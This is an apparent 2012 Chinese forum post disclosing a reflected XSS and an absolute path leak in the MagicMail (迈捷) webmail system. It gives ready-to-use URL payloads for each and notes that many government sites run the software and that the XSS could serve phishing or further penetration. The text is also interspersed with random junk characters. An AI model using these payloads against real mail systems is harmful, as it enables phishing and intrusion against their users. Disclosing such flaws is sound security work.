今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞% i+ T9 y$ k+ }2 m* Q! Z# E
6 p* r! B2 A: W6 Y; C2 o* q
( ?8 } L# k' R
包含 一个反射性XSS 以及 绝对路径泄漏
" w' L6 a4 `1 @# |# ^2 P; d看了看 貌似全部是linux的。
6 {/ k# f m) q2 s- Q$ [
6 g b/ h% `# [& a* z关键字:迈捷邮件系统 by MagicMail
, g. B7 ~ m! _3 n2 H5 p7 N8 e4 c w0 S+ w& W! ], W8 c
可以看到很多政府网站都用这个邮件系统) `+ k+ J9 [" A! T
1 l! ^6 k& U7 i: c% k! F) i
绝对路径 http://madman.in/index.php?login_type=declare&language=
6 J$ f" \4 ~* F$ p+ _
, f# J7 g3 D! M8 p8 ^+ R1 j+ {4 f7 | a
% V+ V! ?2 x2 J GXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
% y) t% t% c6 W, O# q3 {' K8 A# c! ~
- c+ n$ H; m3 O( l) R. v
+ ^# k* p+ O6 }% D9 S- m% v虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等+ T( }# `) h2 @+ ?, R+ j$ G7 P' ^# L6 i
" x+ g" N! w0 I修复方案:看官方补丁吧。
( C& V! f4 p# p# r |
发表于 2012-11-9 20:38:41
收藏
支持
反对